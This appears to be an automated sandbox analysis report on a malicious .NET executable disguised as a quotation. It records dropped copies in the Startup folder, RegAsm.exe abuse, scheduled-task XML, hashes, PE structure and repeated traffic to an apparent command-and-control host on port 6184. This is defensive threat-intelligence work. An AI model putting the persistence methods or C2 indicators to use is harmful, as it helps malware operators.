Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\5thncv Download File
Process:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1020928
Entropy (8bit):	6.7450135182284585
Encrypted:	false
SSDEEP:	12288:95B/zCKY12RnzFAsKibDzxr3Cz2GG3tjNI91JgE8Itd4Y0pnx1ld8C:dbC+z8i/zxrSz2FO91JgE8a4TFxH
MD5:	5A6B8A02021146DBE686B9A5EB628D9A
SHA1:	7DC888C1F8A38A4A7385F666FCEE60BAB258A869
SHA-256:	7FA804F096ED67A239A1FA164BA4A63F06B6FD52F3163C82F096CC12082ACCA9
SHA-512:	DD30026FEF52A4A5700144980C7805D1710E0A5EA504A167FDBC59129A781BE6CEA3DD565D95B2EAFE4D57A8991FEC00D121FD5ACFBB316690BCDB60719CFF9F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 27%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p._................................. ... ....@.. ..............................$H....@.................................t...W.... ..N............................................................................ ............... ..H............text........ ...................... ..`.rsrc...N.... ......................@..@.reloc..............................@..B........................H........d...............q..............................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....B...(.....o....&2.(....t.....(....&2.t....o....F~....~....(.........(.....(.........(....(.........(....(....o.........&...o.....(.....(.....r9..p.....6..{b...(^.....o.....{a...{c....{b...oZ...(^....so....p.....oq...V.{....od....(...+...J.{....o1....ov...*J

C:\Users\user\AppData\Roaming\5thncv:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Non-ISO extended-ASCII text, with NEL line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:F3t:F3t
MD5:	D137D5B6421522A3D19236A56ACCFF51
SHA1:	AE22E7372035E11079F2D03F1ADA51F98E2DA19E
SHA-256:	EF685074F06CB6D1AA010756AF124480A2621EBF53E542036F5A267BB2FEC86A
SHA-512:	405D130E38D0275E57DF0CAF6032923A5CA1C2D3E7D846B46AE04EC831C96D1CACDBBCC071F5C7F4D1AC46540CC6C26CE1EA7729680A8E979918650E5DF47D22
Malicious:	true
Preview:	.D.Z...H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.823079645651109
Encrypted:	false
SSDEEP:	3:oMty8WddSWAnPL4A:oMLW6WAnPL4A
MD5:	743A1D76D284D8E42E19061A3F13A723
SHA1:	D6BBE641CBAC7B46C0922F32DCC89F8F5B87F98C
SHA-256:	86093BF03032ACFCEF934A0D8363B66AAF4ADEE58015DA0172E13635B1DD1FE8
SHA-512:	DF687DCD985D1F6127624220083DFD93A39FEBCE02A869F4126787DF3724890ECC10FF18077BFDEF02FCC802440F3F83545E4DA4BD826DC84E59B26A105F6567
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe Download File
Process:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1024000
Entropy (8bit):	6.738941723536787
Encrypted:	false
SSDEEP:	12288:95B/zCKY12RnzFAsKibDzxr3Cz2GG3tjNI91JgE8Itd4Y0pnx1ld8C:dbC+z8i/zxrSz2FO91JgE8a4TFxH
MD5:	5F6F43FE7C5BDB4D77EFF131C8536E9B
SHA1:	3ED423034972EDF3518B97AFC64632FD4DC8419B
SHA-256:	82660B3E8BA370C6FAA0BF5ACB7C425F9C2D8CACC4194A0E9EE35F68D76D3239
SHA-512:	F61EF23DB4DAC90155D772E22E638CFE7D2C15BF37CE7DB7B0A79468F2489F921CD9E5E7281C96C5FB56A37B34631DCF745E4FF8B35BD9FF0F11FF009ADFDC81
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p._................................. ... ....@.. ..............................$H....@.................................t...W.... ..N............................................................................ ............... ..H............text........ ...................... ..`.rsrc...N.... ......................@..@.reloc..............................@..B........................H........d...............q..............................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....B...(.....o....&2.(....t.....(....&2.t....o....F~....~....(.........(.....(.........(....(.........(....(....o.........&...o.....(.....(.....r9..p.....6..{b...(^.....o.....{a...{c....{b...oZ...(^....so....p.....oq...V.{....od....(...+...J.{....o1....ov...*J

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	275
Entropy (8bit):	4.839531074781769
Encrypted:	false
SSDEEP:	6:z30qJ5tUI+30qobtUmYRZBXVNYL0dxKaRFfnYJin:z30mc30b4BFNY4xNYU
MD5:	1B648D405C15ECA8CF1B9B0469B5627E
SHA1:	C6BBAEDE7AE2353E15271F1FBAA18588BEF0E922
SHA-256:	52FF7329D9E47BF7366892E79338FEE702C60D1F3ADB2EDDB601DFAEC8F170A0
SHA-512:	086EC3F608C80CDB6DC844366CFBBA5237ABCEB5306C0EF7C91600003F1A169CD94EB07D3680E943C9AC498CBA3845857756C5D745A66999BE78C263E5C4405F
Malicious:	false
Preview:	Microsoft .NET Framework Assembly Registration Utility version 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....RegAsm : error RA0000 : Unable to locate input assembly '0' or one of its dependencies...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.7450135182284585
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Quotation ATB-PR28500KINH.exe
File size:	1020928
MD5:	5a6b8a02021146dbe686b9a5eb628d9a
SHA1:	7dc888c1f8a38a4a7385f666fcee60bab258a869
SHA256:	7fa804f096ed67a239a1fa164ba4a63f06b6fd52f3163c82f096cc12082acca9
SHA512:	dd30026fef52a4a5700144980c7805d1710e0a5ea504a167fdbc59129a781be6cea3dd565d95b2eafe4d57a8991fec00d121fd5acfbb316690bcdb60719cff9f
SSDEEP:	12288:95B/zCKY12RnzFAsKibDzxr3Cz2GG3tjNI91JgE8Itd4Y0pnx1ld8C:dbC+z8i/zxrSz2FO91JgE8a4TFxH
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p.._................................. ... ....@.. ..............................$H....@................................

File Icon


Icon Hash:	905ada12e9cc368b

Static PE Info

General
Entrypoint:	0x4a04ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FB6F070 [Thu Nov 19 22:23:44 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa0474	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa2000	0x5a94e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9e4d4	0x9e600	False	0.921844169298	data	7.86217054502	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa2000	0x5a94e	0x5aa00	False	0.0372737068966	data	2.71520754372	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfe000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xa21d8	0x42028	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0xe4200	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xe4668	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 2699173413, next used block 2699173413	English	United States
RT_ICON	0xe6c10	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 3236110116, next used block 3236110116	English	United States
RT_ICON	0xe7cb8	0x10828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0xf84e0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 2162368036, next used block 2162368036	English	United States
RT_GROUP_ICON	0xfc708	0x5a	data	English	United States
RT_MANIFEST	0xfc764	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 10:52:02.466367960 CET	49726	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:02.496193886 CET	6184	49726	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:03.184657097 CET	49726	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:03.214612007 CET	6184	49726	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:03.784126043 CET	49726	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:03.813864946 CET	6184	49726	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:08.033576965 CET	49729	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:08.064066887 CET	6184	49729	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:08.723309994 CET	49729	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:08.753233910 CET	6184	49729	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:09.410831928 CET	49729	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:09.441014051 CET	6184	49729	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:13.485429049 CET	49730	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:13.515448093 CET	6184	49730	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:14.020757914 CET	49730	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:14.050601959 CET	6184	49730	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:14.551795959 CET	49730	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:14.581655025 CET	6184	49730	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:18.705220938 CET	49731	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:18.735104084 CET	6184	49731	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:19.239630938 CET	49731	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:19.269522905 CET	6184	49731	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:19.770930052 CET	49731	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:19.800921917 CET	6184	49731	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:23.858556032 CET	49732	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:23.888431072 CET	6184	49732	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:24.396251917 CET	49732	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:24.426213026 CET	6184	49732	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:24.927702904 CET	49732	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:24.957645893 CET	6184	49732	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:29.029927015 CET	49736	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:29.059813023 CET	6184	49736	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:29.568558931 CET	49736	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:29.598489046 CET	6184	49736	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:30.099837065 CET	49736	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:30.129645109 CET	6184	49736	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:34.375207901 CET	49743	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:34.405150890 CET	6184	49743	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:35.007620096 CET	49743	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:35.037687063 CET	6184	49743	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:35.620990038 CET	49743	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:35.650985956 CET	6184	49743	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:39.703183889 CET	49749	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:39.733134031 CET	6184	49749	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:40.241233110 CET	49749	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:40.271064997 CET	6184	49749	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:40.772504091 CET	49749	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:40.802356958 CET	6184	49749	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:44.845530033 CET	49756	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:47.851152897 CET	49756	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:53.867326021 CET	49756	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:54.051198959 CET	6184	49756	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:58.141248941 CET	49757	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:58.330878973 CET	6184	49757	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:58.836340904 CET	49757	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:59.020982981 CET	6184	49757	194.5.97.9	192.168.2.5
Nov 20, 2020 10:52:59.523906946 CET	49757	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:52:59.709059000 CET	6184	49757	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:03.754981995 CET	49760	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:03.946958065 CET	6184	49760	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:04.461786985 CET	49760	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:04.668989897 CET	6184	49760	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:05.180625916 CET	49760	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:05.370690107 CET	6184	49760	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:09.424768925 CET	49761	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:09.610785961 CET	6184	49761	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:10.119046926 CET	49761	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:10.300734997 CET	6184	49761	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:10.806098938 CET	49761	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:10.990715027 CET	6184	49761	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:15.088957071 CET	49762	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:15.280740976 CET	6184	49762	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:15.790833950 CET	49762	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:15.998838902 CET	6184	49762	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:16.509627104 CET	49762	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:16.690829992 CET	6184	49762	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:20.757941008 CET	49763	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:20.940715075 CET	6184	49763	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:21.447537899 CET	49763	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:21.640497923 CET	6184	49763	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:22.150638103 CET	49763	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:22.350904942 CET	6184	49763	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:26.629566908 CET	49764	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:26.818627119 CET	6184	49764	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:27.447866917 CET	49764	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:27.648524046 CET	6184	49764	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:28.151122093 CET	49764	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:28.350675106 CET	6184	49764	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:32.552192926 CET	49765	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:32.748727083 CET	6184	49765	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:33.260946035 CET	49765	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:33.460822105 CET	6184	49765	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:33.964111090 CET	49765	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:34.140450001 CET	6184	49765	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:38.247296095 CET	49766	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:38.430479050 CET	6184	49766	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:38.933101892 CET	49766	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:39.131073952 CET	6184	49766	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:39.636411905 CET	49766	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:39.820441008 CET	6184	49766	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:43.991276026 CET	49767	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:44.190498114 CET	6184	49767	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:44.699196100 CET	49767	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:44.888396978 CET	6184	49767	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:45.402370930 CET	49767	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:45.600496054 CET	6184	49767	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:49.739514112 CET	49768	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:49.930259943 CET	6184	49768	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:50.434014082 CET	49768	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:50.640510082 CET	6184	49768	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:51.156069994 CET	49768	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:51.340327024 CET	6184	49768	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:55.400423050 CET	49769	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:55.600308895 CET	6184	49769	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:56.106313944 CET	49769	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:56.300492048 CET	6184	49769	194.5.97.9	192.168.2.5
Nov 20, 2020 10:53:56.809448004 CET	49769	6184	192.168.2.5	194.5.97.9
Nov 20, 2020 10:53:57.010358095 CET	6184	49769	194.5.97.9	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 10:51:38.788116932 CET	49992	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:51:38.815205097 CET	53	49992	8.8.8.8	192.168.2.5
Nov 20, 2020 10:51:39.880928993 CET	60075	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:51:39.908036947 CET	53	60075	8.8.8.8	192.168.2.5
Nov 20, 2020 10:51:55.739993095 CET	55016	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:51:55.777512074 CET	53	55016	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:02.374857903 CET	64345	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:02.412364006 CET	53	64345	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:06.545293093 CET	57128	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:06.572278976 CET	53	57128	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:07.995281935 CET	54791	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:08.032438040 CET	53	54791	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:13.445796967 CET	50463	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:13.483804941 CET	53	50463	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:18.668350935 CET	50394	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:18.703979015 CET	53	50394	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:23.822185040 CET	58530	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:23.857530117 CET	53	58530	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:25.016227961 CET	53813	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:25.053634882 CET	53	53813	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:25.163535118 CET	63732	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:25.190555096 CET	53	63732	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:25.247749090 CET	57344	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:25.274890900 CET	53	57344	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:28.992866993 CET	54450	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:29.028661966 CET	53	54450	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:31.312700033 CET	59261	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:31.348434925 CET	53	59261	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:31.952512980 CET	57151	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:31.979826927 CET	53	57151	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:32.442549944 CET	59413	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:32.478214025 CET	53	59413	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:32.830388069 CET	60516	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:32.857480049 CET	53	60516	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:33.274805069 CET	51649	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:33.310241938 CET	53	51649	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:33.727365971 CET	65086	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:33.763178110 CET	53	65086	8.8.8.8	192.168.2.5
Nov 20, 2020 10:52:34.332396984 CET	56432	53	192.168.2.5	8.8.8.8
Nov 20, 2020 10:52:34.368335009 CET	53	56432	8.8.8.8	192.168.2.5
